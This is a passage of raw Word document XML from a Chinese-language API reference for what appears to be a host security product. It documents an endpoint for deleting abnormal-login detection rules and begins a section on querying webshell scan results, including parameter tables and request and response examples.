            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50367C3B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机范围：0-全部主机；1-主机；2-业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7E5D82C8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60B7AD70" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmGroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="018596E1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CF9EC82" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AF32EF7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组，</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmKind</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=2, 该字段有值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1EB6E09C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="646F36AE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmAgentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19918D27" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FE0BFC5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C29E804" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机，</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmKind</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=1, 该字段有值</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="339B6C5E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68D37D96" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmAgentGroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1485D72F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D9CEAEE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37EDA9E4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机所在业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1FB82ED7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C991223" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4759A733" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55702B50" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B3A8975" w14:textId="08D10C17" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>规则详情，见</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:instrText>HYPERLINK \l "condition数据结构" \h</w:instrText>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:t>condition数据结构</w:t>
            </w:r>
            <w:r w:rsidR="00000000">
              <w:rPr>
                <w:rStyle w:val="af6"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="77E99FB4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="289" w:name="_Toc115166217"/>
      <w:bookmarkStart w:id="290" w:name="删除规则"/>
      <w:bookmarkEnd w:id="288"/>
      <w:r>
        <w:t>删除规则</w:t>
      </w:r>
      <w:bookmarkEnd w:id="289"/>
    </w:p>
    <w:p w14:paraId="58A0C608" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供Linux/Windows异常登录删除规则功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADA14AC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B57D651" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>DELETE /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>abnormallogin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>linux,win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>}/rule/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C58E02" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="854"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="0BE2677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CE5BF7E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64EFF34D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6455C975" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A1E6A57" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="28B8A605" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07A83499" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AF6886E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EDCBC4D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3530B5BB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>规则ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4EC5D48C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1677EAAF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/detect/abnormallogin/linux/rule/5a9d026a7d761b3ccfcf2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1172FDAA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037A1E2E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "flag": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE47FC2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>异常说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F062665" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>规则不存在，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FBC057" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>帐号</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>没有权限，会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0EA6AA"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BC669E" w14:paraId="2F9A3A8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F1CB885" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BDFD4AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24EEF58C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E4EC9A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="57BA553A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AC3E518" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5838AF52" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11AAC252" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EED7BFC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>true:成功 false:失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="22647461" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="291" w:name="_Toc115166218"/>
      <w:bookmarkStart w:id="292" w:name="web后门"/>
      <w:bookmarkEnd w:id="276"/>
      <w:bookmarkEnd w:id="290"/>
      <w:r>
        <w:t>Web后门</w:t>
      </w:r>
      <w:bookmarkEnd w:id="291"/>
    </w:p>
    <w:p w14:paraId="02D16CB5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="293" w:name="_Toc115166219"/>
      <w:bookmarkStart w:id="294" w:name="web后门查询结果"/>
      <w:r>
        <w:t>Web后门查询结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="293"/>
    </w:p>
    <w:p w14:paraId="37440976" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供web后门扫描结果数据查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482BC611" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525A4E9F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>websecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux|win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D86F86F"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370"/>
        <w:gridCol w:w="904"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="44B92B9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DF5AFE2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05697128" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3926CF58" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20ED2535" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3D68B7CF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0ECAD2D8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="160773C6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36F13B76" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F82F11C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="06C73B55" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7560449B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0934E84C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DC053FF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="666333CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="43FFCBAB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="243BE906" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2967470D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A1D7637" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="574D1A89" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2649B858" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4735270D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>types</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D2805F2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63790827" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="353AA7F2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="60582319" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7531E21B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
